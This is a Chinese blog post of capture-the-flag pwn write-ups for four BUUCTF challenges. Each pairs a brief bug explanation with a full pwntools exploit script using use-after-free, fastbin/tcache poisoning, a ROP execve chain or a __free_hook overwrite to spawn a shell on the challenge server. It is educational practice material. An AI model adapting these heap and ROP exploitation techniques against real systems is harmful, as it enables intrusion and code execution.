PWN-PRACTICE-BUUCTF-29

最新推荐文章于 2023-03-04 17:08:23 发布
最新推荐文章于 2023-03-04 17:08:23 发布
阅读量343 收藏
点赞数
分类专栏: Pwn-BUUCTF 文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/120249941
版权

PWN-PRACTICE-BUUCTF-29

actf_2019_babyheap

UAF,创建两个非0x10大小的chunk,比如两个0x20
程序会创建四个chunk,大小依次为0x10,0x20,0x10,0x20
按序free掉创建的chunk,两个0x10大小的chunk形成一条链,两个0x20大小的chunk形成一条链
再创建一个0x10大小的chunk,会用到两个在fastbin中0x10大小的chunk
新创建的chunk内容为"/bin/sh"的地址和system的实际地址
最后show(0)即可system("/bin/sh")

# -*- coding:utf-8 -*-
from pwn import *
#context.log_level="debug"
#io=process("./ACTF_2019_babyheap")
io=remote("node4.buuoj.cn",27740)
elf=ELF("./ACTF_2019_babyheap")
libc=ELF("./libc-2.27-18-x64.so")

def add(size,content):
	io.sendlineafter("Your choice: ","1")
	io.sendlineafter("Please input size: \n",str(size))
	io.sendafter("Please input content: \n",content)
def free(index):
	io.sendlineafter("Your choice: ","2")
	io.sendlineafter("Please input list index: \n",str(index))
def show(index):
	io.sendlineafter("Your choice: ","3")
	io.sendlineafter("Please input list index: \n",str(index))

system_plt=elf.plt["system"]
binsh=0x602010

add(0x20,"aaaa")#0
add(0x20,"bbbb")#1

free(0)
free(1)

add(0x10,p64(binsh)+p64(system_plt))#2
show(0)

io.interactive()

wustctf2020_easyfast

UAF,根据0x602090地址处的值来决定是否执行system("/bin/sh")
想办法在0x602090-0x10=0x602080处创建一个chunk,然后修改0x602090处的值为0
可以看到0x602088处有一个值0x50,实际上是当作fake chunk的size域
利用UAF,改写chunk的fd域,使之指向0x602080处,再创建fake chunk改写0x602090的值

# -*- coding:utf-8 -*-
from pwn import *
#context.log_level="debug"
#io=process("./wustctf2020_easyfast")
io=remote("node4.buuoj.cn",28112)
elf=ELF("./wustctf2020_easyfast")
libc=ELF("./libc-2.23-16-x64.so")

def add(size):
	io.sendlineafter("choice>\n","1")
	io.sendlineafter("size>\n",str(size))
def free(index):
	io.sendlineafter("choice>\n","2")
	io.sendlineafter("index>\n",str(index))
def edit(index,content):
	io.sendlineafter("choice>\n","3")
	io.sendlineafter("index>\n",str(index))
	io.sendline(content)
def shell():
	io.sendlineafter("choice>\n","4")

shell_flag=0x602090

add(0x40)#0
add(0x40)#1
free(0)
edit(0,p64(shell_flag-0x10))
add(0x40)#2
add(0x40)#3
edit(3,p64(0))
shell()
io.interactive()

强网杯2019 拟态 STKOF

栈溢出,但是加了拟态防御,参考:拟态防御题型pwn&web初探

# -*- coding:utf-8 -*-
from pwn import *
from struct import pack

def payload32():
	p = ''
	p += pack('<I', 0x0806e9cb) # pop edx ; ret
	p += pack('<I', 0x080d9060) # @ .data
	p += pack('<I', 0x080a8af6) # pop eax ; ret
	p += '/bin'
	p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806e9cb) # pop edx ; ret
	p += pack('<I', 0x080d9064) # @ .data + 4
	p += pack('<I', 0x080a8af6) # pop eax ; ret
	p += '//sh'
	p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806e9cb) # pop edx ; ret
	p += pack('<I', 0x080d9068) # @ .data + 8
	p += pack('<I', 0x08056040) # xor eax, eax ; ret
	p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x080481c9) # pop ebx ; ret
	p += pack('<I', 0x080d9060) # @ .data
	p += pack('<I', 0x0806e9f2) # pop ecx ; pop ebx ; ret
	p += pack('<I', 0x080d9068) # @ .data + 8
	p += pack('<I', 0x080d9060) # padding without overwrite ebx
	p += pack('<I', 0x0806e9cb) # pop edx ; ret
	p += pack('<I', 0x080d9068) # @ .data + 8
	p += pack('<I', 0x08056040) # xor eax, eax ; ret
	p += pack('<I', 0x080a8af6) # pop eax ; ret
	p += p32(0xb)
	p += pack('<I', 0x080495a3) # int 0x80
	return p
	
def payload64():
	p = ''
	p += pack('<Q', 0x0000000000405895) # pop rsi ; ret
	p += pack('<Q', 0x00000000006a10e0) # @ .data
	p += pack('<Q', 0x000000000043b97c) # pop rax ; ret
	p += '/bin//sh'
	p += pack('<Q', 0x000000000046aea1) # mov qword ptr [rsi], rax ; ret
	p += pack('<Q', 0x0000000000405895) # pop rsi ; ret
	p += pack('<Q', 0x00000000006a10e8) # @ .data + 8
	p += pack('<Q', 0x0000000000436ed0) # xor rax, rax ; ret
	p += pack('<Q', 0x000000000046aea1) # mov qword ptr [rsi], rax ; ret
	p += pack('<Q', 0x00000000004005f6) # pop rdi ; ret
	p += pack('<Q', 0x00000000006a10e0) # @ .data
	p += pack('<Q', 0x0000000000405895) # pop rsi ; ret
	p += pack('<Q', 0x00000000006a10e8) # @ .data + 8
	p += pack('<Q', 0x000000000043b9d5) # pop rdx ; ret
	p += pack('<Q', 0x00000000006a10e8) # @ .data + 8
	p += pack('<Q', 0x0000000000436ed0) # xor rax, rax ; ret
	p += pack('<Q', 0x000000000043b97c) # pop rax ; ret
	p += p64(0x3b)
	p += pack('<Q', 0x00000000004011dc) # syscall
	return p

io=remote("node4.buuoj.cn",25016)	
add_esp=0x080a8f69 # add esp, 0xc ; ret
add_rsp=0x00000000004079d5 # add esp, 0xd8 ; ret
payload="a"*0x10C+"\x00"*4+p64(add_esp)+p64(add_rsp)
payload+=payload32().ljust(0xd8,"\x00")
payload+=payload64()
io.sendline(payload)
io.interactive()

hitcon_2018_children_tcache

obo + tcache,参考:HITCON_2018_children_tcache

# -*- coding:utf-8 -*-
from pwn import *
#io=process("./HITCON_2018_children_tcache")
io=remote("node4.buuoj.cn",25946)
elf=ELF("./HITCON_2018_children_tcache")
libc=ELF("./libc-2.27-18-x64.so")

def add(size,content):
	io.sendlineafter("Your choice: ","1")
	io.sendlineafter("Size:",str(size))
	io.sendlineafter("Data:",content)
def show(index):
	io.sendlineafter("Your choice: ","2")
	io.sendlineafter("Index:",str(index))
def free(index):
	io.sendlineafter("Your choice: ","3")
	io.sendlineafter("Index:",str(index))

#gdb.attach(io)
#pause()

add(0x410,"aaaa")#0
add(0xe8,"bbbb")#1
add(0x4f0,"cccc")#2
add(0x60,"dddd")#3

#pause()

free(0)

#pause()

free(1)

#pause()

for i in range(6):
	add(0xe8-i,"b"*(0xe8-i))
	free(0)

#pause()

add(0xe8,"b"*0xe0+p64(0x510))#0

#pause()

free(2) #合并chunk

#pause()

add(0x410,"aaaa")#1

#pause()

show(0)
offset=0x3ebca0
leak_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("leak_addr=="+hex(leak_addr))
libc_base=leak_addr-offset
print("libc_base=="+hex(libc_base))
free_hook=libc_base+libc.sym["__free_hook"]
ones=[0x4f2c5,0x4f322,0x10a38c]
one_gadget=libc_base+ones[1]

#pause()

add(0x60,"dddd")#2

#pause()

free(0)

#pause()

free(2) #double free

#pause()

add(0x60,p64(free_hook))
add(0x60,p64(free_hook))
add(0x60,p64(one_gadget))

#pause()

free(0)

io.interactive()
P1umH0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2021.05.25 XCTF入门RE | CTF - RE
JiangBuLiu的博客
03-19 1979
样本编译方式CPython南邮Py.pyc C Python 支持所有Python版本的Pyc反编译工具(在线) 或者下载pyc的反编译工具uncompyle6 南邮Py.pyc 反编译后的源码为: import base64 def encode(message): s = '' for i in message: x = ord(i) ^ 32 x = x + 16 s += chr(x) return base64.b64en
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
记一次院赛CTF的Crypto和Re题(入门)
CTF小白的博客
04-14 7351
目录Cryptoeasy cryptobAcOn敌军密报Reeasy re跳到对的地方简单的XOR多密码表替换 Crypto easy crypto 首先,这个可以很容易的看出这是一个base64加密一串密文,然后用base64解密后是 可以看出这就是flag的格式,所以一般就是凯撒加密了,但是因为有花括号下划线之类的,所以是凯撒的一个变形rot13 bAcOn 这题是给了一个字符串baCo...
【2021.12.25】ctf逆向中常见加密算法和编码识别
qq_35289660的博客
03-04 2459
在对数据进行变换的过程中,除了简单的字节操作之外,还会使用一些常用的编码加密算法,因此如果能够快速识别出对应的编码或者加密算法,就能更快的分析出整个完整的算法。 CTF 逆向中通常出现的加密算法包括 base64、TEA、AES、RC4、MD5 等。
(攻防世界)(pwnpwn1(厦门邀请赛)babystack
PLpa的博客
07-21 2599
canary!canary!canary! 拿到题目,下载附件,查看保护。 可以很清楚的看到,程序开了canary,这就说明我们不能实现暴力的栈溢出,还要考虑这个canary的值。 我们首先运行一下程序: 可以很清楚的看出程序的功能,当我们选择1时,我们就可以输入,当我们选择2时,我们可以输出我们前面输入的东西。 进入IDA看源代码: 我们可以看到canary的值存放在v6里,v6距离rbp...
【LinkCTF-29】Crypto--密码本
VZZmieshenquan的博客
03-02 2062
Description: 密码本(提交你找到的字符串的md5值) 这个密码本本该只使用一次的,但是却使用了多次,导致密文易被破解 经过一番尝试发现,秘钥的首字母很可能是y,剩下的就靠你了 cip1: rlojsfklecby cip2: ulakqfgfsjlu cip3: dpaxwxtjgtay Solution: 先写py脚本 看到thos猜测是those,经过测试key变为了ye...
PWN-PRACTICE-BUUCTF-7
P1umH0的博客
08-07 189
PWN-PRACTICE-BUUCTF-7jarvisoj_fmciscn_2019_s_3bjdctf_2020_babystack2[HarekazeCTF2019]baby_rop2 jarvisoj_fm ciscn_2019_s_3 bjdctf_2020_babystack2 [HarekazeCTF2019]baby_rop2
PWN-PRACTICE-BUUCTF-22
P1umH0的博客
09-08 441
PWN-PRACTICE-BUUCTF-22hitcontraining_unlinkpicoctf_2018_leak_mesuctf_2018_basic pwnaxb_2019_brop64 hitcontraining_unlink unlink,参考:[BUUCTF]PWN——hitcontraining_unlink # -*- coding:utf-8 -*- from pwn import * #io=process("./bamboobox") io=remote("node4.buuoj
PWN-PRACTICE-BUUCTF-30
P1umH0的博客
09-13 156
PWN-PRACTICE-BUUCTF-30suctf_2018_stackwdb_2018_3rd_soEasy[BSidesCF 2019]Runitqctf2018_stack2 suctf_2018_stack 栈溢出,ret2text,返回地址不能直接是next_door的起始地址 设置返回地址为0x40067A,开始设置系统调用的参数以及系统调用号 from pwn import * #context.log_level='debug' #io=process('./SUCTF_2018_sta
PWN-PRACTICE-BUUCTF-12
P1umH0的博客
08-08 143
PWN-PRACTICE-BUUCTF-12cmcc_simpleroppicoctf_2018_buffer overflow 2babyfengshui_33c3_2016xdctf2015_pwn200 cmcc_simplerop 静态编译的32位elf,找一个"int 80h"执行系统调用 前提是利用栈溢出读入字符串"/bin/sh\x00",然后找pop给寄存器赋值,最后"int 80h" from pwn import * io = remote('node4.buuoj.cn',27587)
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
PWN-PRACTICE-BUUCTF-25
P1umH0的博客
09-10 793
PWN-PRACTICE-BUUCTF-25wustctf2020_name_your_catciscn_2019_final_2mrctf2020_shellcode_revengezctf2016_note2 wustctf2020_name_your_cat 通过数组越界写返回地址为后门shell的地址 from pwn import * #io=process('./wustctf2020_name_your_cat') io=remote('node4.buuoj.cn',28864) elf=E
PWN-PRACTICE-BUUCTF-23
P1umH0的博客
09-09 660
PWN-PRACTICE-BUUCTF-23gyctf_2020_some_thing_excetingaxb_2019_heap[极客大挑战 2019]Not Badinndy_echo gyctf_2020_some_thing_exceting 程序读取了flag到bss段上的0x6020A8地址处 存在uaf漏洞,利用fastbins的LIFO原则,create大小合适的chunk并free 再次create,将0x6020A8覆写到之前create并free掉的chunk里,最后show即可打印出
PWN-PRACTICE-BUUCTF-24
P1umH0的博客
09-09 299
PWN-PRACTICE-BUUCTF-24
PWN-PRACTICE-BUUCTF-1
P1umH0的博客
07-04 279
PWN-PRACTICE-BUUCTF-1
PWN-PRACTICE-BUUCTF-17
P1umH0的博客
09-05 268
PWN-PRACTICE-BUUCTF-17hitcontraining_heapcreatorwustctf2020_closedciscn_2019_es_7hitcon2014_stkof hitcontraining_heapcreator 单字节溢出,修改下一个chunk的size,造成chunk overlap,实现任意地址读写 参考:buuctf hitcontraining_heapcreator HITCON Trainging lab13 # -*- coding:UTF-8 -*-
攻防世界pwn-forgot
最新发布
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值